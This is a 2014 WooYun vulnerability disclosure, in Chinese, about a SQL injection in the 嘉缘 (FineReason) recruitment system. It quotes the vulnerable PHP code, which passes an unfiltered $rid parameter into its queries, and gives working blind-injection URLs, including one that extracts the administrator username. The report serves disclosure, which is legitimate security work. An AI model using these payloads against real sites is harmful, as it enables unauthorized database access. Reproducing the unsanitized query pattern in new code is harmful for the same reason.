当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-066708
漏洞标题:
嘉缘人才系统SQL注入
相关厂商:
嘉缘官网
漏洞作者:
My5t3ry
提交时间:
2014-07-02 16:03
修复时间:
2014-09-30 16:04
公开时间:
2014-09-30 16:04
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-07-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

嘉缘人才系统SQL注入一枚。

详细说明:

嘉缘人才系统是php下用户量最多的厂商,比phpyun还多。。。
360库带计划一般厂商。
厂商url:http://www.finereason.com
http://loudong.360.cn/company/info/id/43
漏洞位于/member/person_resume.php 7 - 30行,代码如下:

defined('IN_FR') or exit('Access Denied');
if($user_type!='pmember'){
	echo "<script>alert('您好,您不是个人会员不能操作此功能!');location.href='javascript:history.back()';</script>";
	exit;
}
if($do=='del'){
    $db ->query("delete from {$cfg['tb_pre']}education where e_rid=$rid and e_pmember='$username'");
    $db ->query("delete from {$cfg['tb_pre']}training where t_rid=$rid and t_pmember='$username'");
    $db ->query("delete from {$cfg['tb_pre']}lang where l_rid=$rid and l_pmember='$username'");
    $db ->query("delete from {$cfg['tb_pre']}work where w_rid=$rid and w_pmember='$username'");
    $db ->query("delete from {$cfg['tb_pre']}resume where r_mid='$Memberid' and r_id=$rid");
	showmsg('删除成功!',"?m=person_resume&show=$show",0,2000);exit();
}elseif($do=='activate'){
    $db ->query("update {$cfg['tb_pre']}resume set r_cnstatus=0 where r_mid='$Memberid'");
    $db ->query("update {$cfg['tb_pre']}resume set r_cnstatus=1 where r_id=$rid and r_mid='$Memberid'");
    showmsg('激活成功!',"?m=person_resume&show=$show",0,2000);exit();
}elseif($do=='refresh'){
    if($rid){
        $db ->query("update {$cfg['tb_pre']}resume set r_adddate=NOW() where r_id=$rid and r_mid='$Memberid'");
    }else{
        $db->query("update {$cfg['tb_pre']}resume set r_adddate=NOW() where r_mid='$Memberid'");
    }
    showmsg('刷新成功!',"?m=person_resume&show=$show",0,2000);exit();
}else{

漏洞证明:

其中的$rid未经过滤带入了SQL,下面来测试,注册一个会员并登陆
访问
http://192.168.116.128/frcmsnew/member/index.php?m=person_resume&do=activate&rid=@`'` or r_id=if((1=1),9999,(select 1 from information_schema.tables))%23@`'`
如图1,查询为真,返回正常页面。

1.jpg


继续访问
http://192.168.116.128/frcmsnew/member/index.php?m=person_resume&do=activate&rid=@`'` or r_id=if((1=2),9999,(select 1 from information_schema.tables))%23@`'`
如图2,查询为假,页面报错。

2.jpg


把其中的1=1替换为我们的注射语句就行了,如查询管理员用户名的第一个字符是否为a:
http://192.168.116.128/frcmsnew/member/index.php?m=person_resume&do=activate&rid=@`'` or r_id=if((ascii(substring((select a_user from job_admin limit 0,1),1,1))=97),9999,(select 1 from information_schema.tables))%23@`'`

修复方案:

做好过滤。

版权声明:转载请注明来源 My5t3ry@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝